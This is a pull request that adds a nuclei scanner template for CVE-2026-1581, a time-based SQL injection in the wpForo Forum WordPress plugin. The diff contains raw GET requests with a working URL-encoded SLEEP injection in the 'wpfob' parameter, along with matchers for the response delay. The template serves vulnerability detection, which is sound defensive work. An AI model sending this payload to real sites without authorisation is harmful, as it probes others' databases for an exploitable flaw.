### PR TITLE
CVE-2026-1581: wpForo Forum Time-Based SQL Injection

### DIFF
--- a/http/cves/2026/CVE-2026-1581.yaml
+++ b/http/cves/2026/CVE-2026-1581.yaml
@@ -1,0 +1,50 @@
+id: CVE-2026-1581
+
+info:
+  name: wpForo Forum <= 2.4.14 - Time-Based SQL Injection
+  author: pdteam
+  severity: high
+  description: |
+    The wpForo Forum plugin for WordPress is vulnerable to time-based SQL injection via the 'wpfob' parameter in all versions up to and including 2.4.14 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-1581
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/4c447dbb-f8fb-4b46-9c47-20ab7330bbaa
+    - https://plugins.trac.wordpress.org/changeset/3459801/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2026-1581
+    cwe-id: CWE-89
+    epss-score: 0.00043
+    epss-percentile: 0.13276
+    cpe: cpe:2.3:a:gvectors:wpforo:*:*:*:*:*:wordpress:*:*
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: gvectors
+    product: wpforo
+    framework: wordpress
+    publicwww-query: "/wp-content/plugins/wpforo/"
+  tags: cve,cve2026,wordpress,wp-plugin,sqli,wpforo,unauth
+
+variables:
+  sleep_time: "{{rand_int(5, 7)}}"
+
+http:
+  - raw:
+      - |
+        @timeout: 15s
+        GET /?wpforo=recent&wpfob=IF(1%3D1%2CSLEEP({{sleep_time}})%2C0) HTTP/1.1
+        Host: {{Hostname}}
+        
+      - |
+        @timeout: 15s
+        GET /community/?wpfob=IF(1%3D1%2CSLEEP({{sleep_time}})%2C0) HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - '(duration_1 >= {{sleep_time}} || duration_2 >= {{sleep_time}})'
+          - '(status_code_1 == 200 || status_code_2 == 200)'
+        condition: and


### PR DESCRIPTION
Added nuclei template for CVE-2026-1581, a time-based SQL injection vulnerability in the wpForo Forum plugin for WordPress affecting versions <= 2.4.14.

**Vulnerability Details:**
- **CVE**: CVE-2026-1581
- **CVSS**: 7.5 (High)
- **Affected**: wpForo Forum plugin <= 2.4.14
- **Vector**: Unauthenticated time-based SQL injection via the `wpfob` parameter
- **CWE**: CWE-89 (SQL Injection)

**Template Features:**
- Tests multiple endpoints (`?wpforo=recent` and `/community/`)
- Uses time-based detection with randomized sleep duration
- URL-encoded payloads for reliability
- Includes proper classification metadata

**References:**
- https://nvd.nist.gov/vuln/detail/CVE-2026-1581
- https://www.wordfence.com/threat-intel/vulnerabilities/id/4c447dbb-f8fb-4b46-9c47-20ab7330bbaa
- https://plugins.trac.wordpress.org/changeset/3459801/